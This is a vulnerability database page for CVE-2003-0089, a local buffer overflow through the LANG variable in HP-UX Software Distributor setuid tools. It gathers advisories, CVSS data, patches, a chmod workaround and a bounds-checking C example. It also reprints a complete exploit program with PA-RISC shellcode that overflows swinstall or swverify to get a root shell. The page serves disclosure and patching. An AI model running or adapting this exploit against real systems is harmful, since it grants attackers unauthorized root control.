CVE-2003-0089
CVSS 7.2
Published: 2003-12-15 00:00:00
Last modified: 2016-10-17 22:29:24

[Original] Buffer overflow in the Software Distributor utilities for HP-UX B.11.00 and B.11.11 allows local users to execute arbitrary code via a long LANG environment variable to setuid programs such as (1) swinstall and (2) swmodify.


[CNNVD] HP-UX Software Distributor Local Buffer Overflow Vulnerability (CNNVD-200312-038)

The Software Distributor (SD) toolkit in HP-UX contains several programs such as swinstall, which are used to create, install, distribute and manage software products. Some of these programs are installed suid root, for example swinstall and swmodify, and contain a buffer overflow vulnerability that allows a local attacker to execute arbitrary code with root privileges.
When the environment variable LANG is set to an overly long string, programs such as swinstall copy it into a fixed-size buffer without bounds checking, causing a stack buffer overflow. By overwriting the saved return address and other data on the stack, a local attacker can obtain root privileges.
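The flaw described above is the classic unbounded copy of an environment variable into a fixed-size stack buffer. The C code below is an added illustration, not HP's code or the advisory's: it shows that pattern beside a bounded, validated replacement that falls back to the C locale, where LANG_BUF is an assumed buffer size and overlong_lang() builds a constructed input the length of the published proof-of-concept's payload.

```c
#include <string.h>
#include <ctype.h>

#define LANG_BUF 64   /* assumed fixed-size buffer; the real size is not on the page */

/* The flawed pattern the advisory describes, kept only for contrast (never called):
 * LANG is copied into a fixed-size buffer with no length check, so a value longer
 * than LANG_BUF overruns the stack of a setuid program such as swinstall. */
void copy_lang_unsafe(char out[LANG_BUF], const char *lang) { strcpy(out, lang); }

/* Hardened replacement: accept LANG only if it is non-empty, fits the buffer with
 * its terminator, and looks like a locale name (ll_CC.codeset@modifier). Anything
 * else falls back to "C". Returns 1 if lang was accepted, 0 if rejected. */
int copy_lang_safe(char out[LANG_BUF], const char *lang)
{
    size_t i, n;
    if (lang == NULL || (n = strlen(lang)) == 0 || n >= LANG_BUF)
        goto reject;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)lang[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-' && c != '@')
            goto reject;
    }
    memcpy(out, lang, n + 1);
    return 1;
reject:
    strcpy(out, "C");
    return 0;
}

/* Returns the locale name the program would actually use for a given LANG value
 * (static storage: each call overwrites the previous result). */
const char *effective_locale(const char *lang)
{
    static char out[LANG_BUF];
    copy_lang_safe(out, lang);
    return out;
}

/* Constructed input mirroring the advisory's trigger: a run of 'A' bytes as long
 * as the published proof-of-concept's buffer (T_LEN = 2124). */
const char *overlong_lang(void)
{
    static char big[2124 + 1];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return big;
}
```

A setuid program should treat LANG exactly like any other attacker-controlled input: length-check it against the destination, restrict it to the characters a locale name can contain, and fall back to a known-safe default when it fails either test.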

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in complete system downtime]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:hp:hp-ux:11.00  HP-UX 11.00
cpe:/o:hp:hp-ux:11.11  HP-UX 11.11

- OVAL (technical details for detection)

oval:org.mitre.oval:def:5466  HP-UX Running Software Distributor (SD), Local Increased Privileges.
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0089
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0089
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-038
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0038.html
(UNKNOWN)  VULNWATCH  20031113 NSFOCUS SA2003-07: HP-UX Software Distributor Buffer Overflow Vulnerability
http://marc.info/?l=bugtraq&m=106873965001431&w=2
(UNKNOWN)  BUGTRAQ  20031113 NSFOCUS SA2003-07: HP-UX Software Distributor Buffer Overflow Vulnerability
http://www.securityfocus.com/advisories/6030
(VENDOR_ADVISORY)  HP  HPSBUX0311-293
http://www.securityfocus.com/bid/8986
(VENDOR_ADVISORY)  BID  8986
http://xforce.iss.net/xforce/xfdb/13623
(VENDOR_ADVISORY)  XF  hp-sd-utilities-bo(13623)

- Vulnerability information

HP-UX Software Distributor Local Buffer Overflow Vulnerability
High risk  Boundary condition error
2003-12-15 00:00:00 2009-03-04 00:00:00
Local

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends temporarily removing the suid root bit from all programs in the SD toolkit:
# chmod a-s /usr/sbin/sw*
Vendor patches:
HP
--
HP has released a security bulletin (HPSBUX0311-293) and the corresponding patches for this issue:
HPSBUX0311-293: SSRT3656 Buffer overflow in Software Distributor (SD) for HP-UX
Patch downloads:
HP HP-UX 11.0:
HP Patch PHCO_28847

http://itrc.hp.com

HP HP-UX 11.11:
HP Patch PHCO_28848

http://itrc.hp.com

- Vulnerability information (23343)

HP-UX 11 Software Distributor Lang Environment Variable Local Buffer Overrun Vulnerability (EDBID:23343)
hp-ux local
2002-12-11 Verified
0 watercloud
source: http://www.securityfocus.com/bid/8986/info

HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M). 

/*
  Program : x_hpux_11i_sw.c
  Use     : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
  Compile : cc x_hpux_11i_sw.c -o x_sw ; ./x_sw   ( do not use gcc on some systems )
  Usage   : ./x_sw [ off ]
  Tested  : HP-UX B11.11 & HP-UX B11.0
  Author  : watercloud [@] xfocus.org
  Date    : 2002-12-11
  Note    : Use at your own risk !!
*/
#include <stdio.h>
#include <stdlib.h>   /* atoi, putenv */
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */
#define T_LEN  2124
#define BUFF_LEN 1688
#define NOP 0x0b390280   /* PA-RISC no-op instruction used for the sled */
char shellcode[]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";

long addr;
char buffer_env[2496];
char buffer[T_LEN];

int main(int argc, char **argv)
{
    int addr_off = 8208 ;
    int  n=BUFF_LEN/4,i=0;
    long * ap = (long *) &buffer[BUFF_LEN];            /* area that overwrites saved stack data */
    char * sp = &buffer[BUFF_LEN-strlen(shellcode)];   /* shellcode sits at the end of the sled */
    long * np = (long *) buffer;
    if(argc > 1)                      /* original tested argc > 0, which read argv[1] even when absent */
        addr_off += atoi(argv[1]);    /* optional offset adjustment from the command line */
    addr = ( (long) &addr_off +addr_off) /4 * 4  +4;   /* guessed, 4-byte aligned stack address */
    for(i=0;i<n;np[i++]=NOP);                           /* fill the first BUFF_LEN bytes with NOPs */
    memcpy(sp,shellcode,strlen(shellcode));
    for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr);         /* repeat the address over the rest */
    buffer[T_LEN -2 ] += 1; buffer[T_LEN - 1 ] = '\0';
    sprintf(buffer_env,"LANG=AAA%s",buffer);
    putenv(buffer_env);
    execl("/usr/sbin/swinstall","swinstall","/tmp/null",NULL);
    /* if that fails, test swverify. */
    execl("/usr/sbin/swverify","swverify",NULL);
    return 0;
}
		

- Vulnerability information (F32180)

sa2003-07.txt (PacketStormID:F32180)
2003-11-14 00:00:00
NSFOCUS  nsfocus.com
advisory,overflow,local,root
hpux
CVE-2003-0089

NSFOCUS Security Advisory SA2003-07 - The HP-UX Software Distributor utilities are susceptible to a buffer overflow vulnerability when reading in the LANG variable since they do not perform any bounds checking on its size. Due to this, local attackers could gain root privileges.


NSFOCUS Security Advisory(SA2003-07)

Topic: HP-UX Software Distributor Buffer Overflow Vulnerability

Release Date: 2003-11-13

CVE CAN ID: CAN-2003-0089

http://www.nsfocus.com/english/homepage/research/0307.htm

Affected system:
===================

- HP-UX B.11.00
- HP-UX B.11.11

Summary:
=========

NSFOCUS Security Team has found a buffer overflow in Software Distributor
utilities for HP-UX. By exploiting the vulnerability local attackers could
gain root privilege.

Description:
============

The Software Distributor (SD) utilities for HP-UX contain a number of programs
such as swinstall. These programs are used to create, install, distribute
and manage software products. A buffer overflow exists in the programs with
suid root bit (such as swinstall/swmodify etc) and allows local attackers
to run arbitrary code with root privilege.

If the environment variable LANG is set to an overly large string, programs such
as swinstall will copy it into a fixed-size buffer without any bounds check,
which causes a stack overflow. By overwriting the return address and other
data in the stack, local attackers could gain root privilege.

Workaround:
=============

NSFOCUS suggests temporarily removing the suid root bit from all the
programs in the SD utilities.

# chmod a-s /usr/sbin/sw*

Vendor Status:
==============

2002.11.19 Informed the vendor
2002.12.05 Vendor confirmed the vulnerability
2003.11.05 Vendor released a security bulletin (HPSBUX0311-293) and related
           patches for the vulnerability.

Detailed information for the HP security bulletin is available at:
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0311-293

Note: Valid ITRC account is required for the link above.

Patch ID:

HP-UX B.11.00  PHCO_28847
HP-UX B.11.11  PHCO_28848

Additional Information:
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CAN-2003-0089 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security 
problems. Candidates may change significantly before they become official
CVE entries.

Acknowledgment
===============

Yang Jilong of NSFOCUS Security Team found the vulnerability. 

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA

    

- Vulnerability information

2781
HP-UX Software Distributor Privilege Escalation
Patch / RCS
Vendor Verified

- Vulnerability description

HP-UX Versions B.11.00 and B.11.11 contain a flaw that may allow a malicious local user to escalate their privileges. The vulnerability is caused by boundary errors in some suid "root" SD (Software Distributor) utilities when handling the "LANG" environment variable. These can be exploited to cause buffer overflows by setting an overly long, specially crafted string.

- Timeline

2003-11-06 Unknown
Unknown 2003-11-05

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, HP has released a patch to address this vulnerability.

- Related references

- Credit

Unknown or Incomplete

- Vulnerability information

HP-UX Software Distributor Lang Environment Variable Local Buffer Overrun Vulnerability
Boundary Condition Error 8986
No Yes
2003-11-03 12:00:00 2006-10-25 08:43:00
Discovery is credited to NSFocus.

- Affected program versions

HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0

- Discussion

HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M).

- Exploit

Exploit code from watercloud <watercloud@xfocus.org> is available.

- Solution

HP has released fixes.


HP HP-UX 11.0

HP HP-UX 11.0 4

HP HP-UX 11.11

- Related references
